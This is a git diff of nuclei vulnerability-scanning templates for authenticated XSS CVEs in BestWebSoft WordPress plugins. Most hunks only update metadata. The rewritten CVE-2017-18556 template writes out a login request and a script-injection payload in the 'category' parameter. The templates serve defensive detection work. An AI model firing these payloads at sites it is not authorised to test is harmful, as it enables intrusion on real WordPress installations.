bestwebsoft product: social_login framework: wordpress - publicwwww-query: "/wp-content/plugins/social-login-bws/" - tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated + publicwww-query: "/wp-content/plugins/social-login-bws/" + tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 490a0046304402201e54a7373a231dbc6b2c61a8ad243a4d9ca0cb433f1dc4b7347b72544d68fb730220443ed55483f1ec291954c730eea389973a3d35da03683f37da5cf66bb4997b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18502.yaml b/nuclei-templates/CVE-2017/CVE-2017-18502.yaml index eb5507e0e6..c6c6d10ba6 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18502.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61153 + epss-percentile: 0.61251 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: subscriber framework: wordpress publicwww-query: "/wp-content/plugins/subscriber/" - tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated + tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4b0a0048304602210092fafdfc4dd231ecc7b9289691d7e12a13007fd6b1a751d0163f3551e35d5ff5022100df598f0081f1033cb1bfb83f06539e67bf280c72d91d7eaea2de4a8aa7622f18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18505.yaml b/nuclei-templates/CVE-2017/CVE-2017-18505.yaml index df66136252..93ddcfad77 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18505.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52875 + epss-percentile: 0.51969 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: twitter_button framework: wordpress publicwww-query: "/wp-content/plugins/twitter-plugin/" - tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4b0a00483046022100bc88f4d1d8623f96a816c8831fd65cbb3612d92bac3df60ef5a3ce6b521b45950221009117db285be8ec76b3df405135a53c182b0913fce5e9b007cb6ed1d51adc0ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18516.yaml b/nuclei-templates/CVE-2017/CVE-2017-18516.yaml index 96e41348b0..bedf2a9ea8 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18516.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: linkedin framework: wordpress publicwww-query: "/wp-content/plugins/bws-linkedin/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: - raw: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 490a00463044022064069f010fcabf123b6f0863ca9c3e60a9a52100d0f489ff97d82d4607d320c3022013ef46f3cf5b2291023dacf09d647a35af224cff045f2acafc19b0fea6ffb7e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18517.yaml b/nuclei-templates/CVE-2017/CVE-2017-18517.yaml index f23aaad8e6..590b427a09 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18517.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: pinterest framework: wordpress publicwww-query: /wp-content/plugins/bws-pinterest/ - tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated + tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft http: - raw: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4b0a00483046022100b883b11a83e0a3d4f2d273832e9669171d209deaba087b81f30fa583e235a6e4022100c97ce083a59da8e8e9263d0538ef109cb70fba7e6e42151ff77923cd6a64f0c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18518.yaml b/nuclei-templates/CVE-2017/CVE-2017-18518.yaml index 6aff1da7cd..a6aa60cd0c 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18518.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,8 +26,8 @@ info: vendor: bestwebsoft product: smtp framework: wordpress - publicwwww-query: /wp-content/plugins/bws-smtp/ - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated + publicwww-query: /wp-content/plugins/bws-smtp/ + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: - raw: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4a0a00473045022100d983ac0f16be15fbe46e48839a1b228ec23c2ea615ae8e424d67d656d30320f102205ab4a6e65c278a5572b84a65b604466d60814f6ba2f249e241ffbf5e7f48bf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18527.yaml b/nuclei-templates/CVE-2017/CVE-2017-18527.yaml index be8fc9ccf8..b62e90fb9a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18527.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: pagination framework: wordpress publicwww-query: "/wp-content/plugins/pagination/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated + tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4a0a00473045022100fc223f1704a9c522f2318dee22a7429173bcf18ba1473edf051dd9dcb73c1aa202204de8b86e9b5a903eaab5a4e1f40525e2f9d9f24a64fd7be332e7fb16fb927323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18528.yaml b/nuclei-templates/CVE-2017/CVE-2017-18528.yaml index 1fab28b746..5e2a3b4028 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18528.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,8 +25,8 @@ info: vendor: bestwebsoft product: pdf_\&_print framework: wordpress - publicewww-query: "/wp-content/plugins/pdf-print/" - tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated + publicwww-query: "/wp-content/plugins/pdf-print/" + tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4b0a00483046022100f8166f1a3b388f0b5651fbf87e735894e771f1296a39c47818bfd43fd41afbff022100ef0e0e38658c8a22c96b2baad3e33ae19e357f4dfa0268dc2f6356bd275a5842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18529.yaml b/nuclei-templates/CVE-2017/CVE-2017-18529.yaml index 5df2ca6d88..844e663cbb 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18529.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: promobar framework: wordpress publicwww-query: /wp-content/plugins/promobar/ - tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated + tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a0047304502202383e46f6f863975f310fbd65e19684b7cde72098f9b445a5336bcedb89d870002210083c1981639140e1461cdb1d2bcfd824cce7be3c803a911f3c4e865f76ed989df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18530.yaml b/nuclei-templates/CVE-2017/CVE-2017-18530.yaml index d18c1724ff..b51207a43c 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18530.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18530.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: rating framework: wordpress publicwww-query: "/wp-content/plugins/rating-bws/" - tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated + tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4b0a004830460221008f037c9ac14dc5c1cfeb60d249440d0390a033dfffe4efe61bf93221c5e956f9022100bbace21ce4e16a5410267194539f3a9d88cf08c10c88ae292095d061e267c7ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18532.yaml b/nuclei-templates/CVE-2017/CVE-2017-18532.yaml index 87ca00870a..f926ec8b94 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18532.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18532.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: realty framework: wordpress publicwww-query: /wp-content/plugins/realty/ - tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated + tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 490a00463044022010a99fc1d34847aa98c6133ba4075071d7670c4ac258728b216a6fdbd53f17360220077176119539c4fc11818453a98156a95a1424dc3a4d9ee9a1eed552d8a14bd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18537.yaml b/nuclei-templates/CVE-2017/CVE-2017-18537.yaml index 2bfc428488..a967010a40 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18537.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,8 +25,8 @@ info: vendor: bestwebsoft product: visitors_online framework: wordpress - publicewww-query: "/wp-content/plugins/visitors-online/" - tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated + publicwww-query: "/wp-content/plugins/visitors-online/" + tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100c5ae176a3006d4f53c2c32dcd009edd3442cfbb038503f7963b4b7d221b2f9b9022100898fd366888d1facc8994d71084fe73dfda9848f56b39bbc4207e81da84163bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18542.yaml b/nuclei-templates/CVE-2017/CVE-2017-18542.yaml index 5b4642f95e..4dc23667c9 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18542.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.60064 + epss-percentile: 0.59511 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: zendesk_help_center framework: wordpress publicwww-query: "/wp-content/plugins/zendesk-help-center/" - tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated + tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a00473045022100b1773fa7c64ffa7db3b5aad9999ba1be6f00f279035bf301dd311da245fc0b05022003c432007ef5fe07cdd40f4604f7ecba8c7a66d7bc1a8994560f9e6672fcb49f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18556.yaml b/nuclei-templates/CVE-2017/CVE-2017-18556.yaml index 421c8b973d..0069a24e8b 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18556.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18556.yaml @@ -1,24 +1,35 @@ id: CVE-2017-18556 info: - name: The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. + name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.7.1 reference: - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - https://nvd.nist.gov/vuln/detail/CVE-2017-18556 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556 - https://wordpress.org/plugins/bws-google-analytics/#developers classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-18556 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36245 + cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - tags: cve,cve2017,wordpress,wp-plugin,xss,authenticated + max-request: 3 + vendor: bestwebsoft + product: google_analytics + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-google-analytics/" + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -26,24 +37,19 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(42)%3C/script%3E HTTP/1.1 + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and matchers: - - type: word - part: body - words: - - ">\">All" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google Analytics by BestWebSoft")' + condition: and +# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18557.yaml b/nuclei-templates/CVE-2017/CVE-2017-18557.yaml index aabb992c74..90fa86fe6c 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18557.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36857 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: google_maps framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-maps/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft http: - raw: @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 4b0a00483046022100d957e1f9517cb376d38598784b9a5992125c36001062b77f6c9693c16062dae6022100e583b2932fca33ca1b832bc010e79ced9ca2fd55ef37e094cfead6e4ef4aa28b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18558.yaml b/nuclei-templates/CVE-2017/CVE-2017-18558.yaml index d3be5453b5..ac1987e5ac 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18558.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: testimonials framework: wordpress publicwww-query: "/wp-content/plugins/bws-testimonials/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450221008a5d52c411f963412d93f7039250cf7c1607875907a65b124fa6784e66f19743022053a9b81e0b27fec8da4451b120e46ad144640e66d9268d4948e2e8286fca8e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18562.yaml b/nuclei-templates/CVE-2017/CVE-2017-18562.yaml index af798841cb..cf3f3bc36f 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18562.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36857 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: error_log_viewer framework: wordpress publicwww-query: "/wp-content/plugins/error-log-viewer/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4a0a00473045022025f4273f398c7b248a6b91a2ea1c21936fbc314e3f36d9bc393d3679d098c8e8022100eb283d90e8200c28e6cafdbb214db272e838194ef6a85ba21b3b4f5c63f0ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18564.yaml b/nuclei-templates/CVE-2017/CVE-2017-18564.yaml index cf327a91fd..4aa9bf9453 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18564.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: sender framework: wordpress publicwww-query: "/wp-content/plugins/sender/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4a0a00473045022100daa604addde162520e7f2e0a763dca1a7ce6a3dac984c168ad92821acb2be13b022011c39e9ebe0f0e167c67abefd5cfa3ba057edc5ad037b993e552368b79b46078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18565.yaml b/nuclei-templates/CVE-2017/CVE-2017-18565.yaml index b7491b01cd..8c99ba4b6a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18565.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: updater framework: wordpress publicwww-query: "/wp-content/plugins/updater/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated + tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a0047304502201f4cc29bc2dc1bb345fd65444af87c4996e808ca51e73933e1b1c7ad3f62d8a5022100e74e5c14061257bfe0d7e0291e063d9ec7595d3759bdd5638ae174cf5fc858c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950 \ No newline 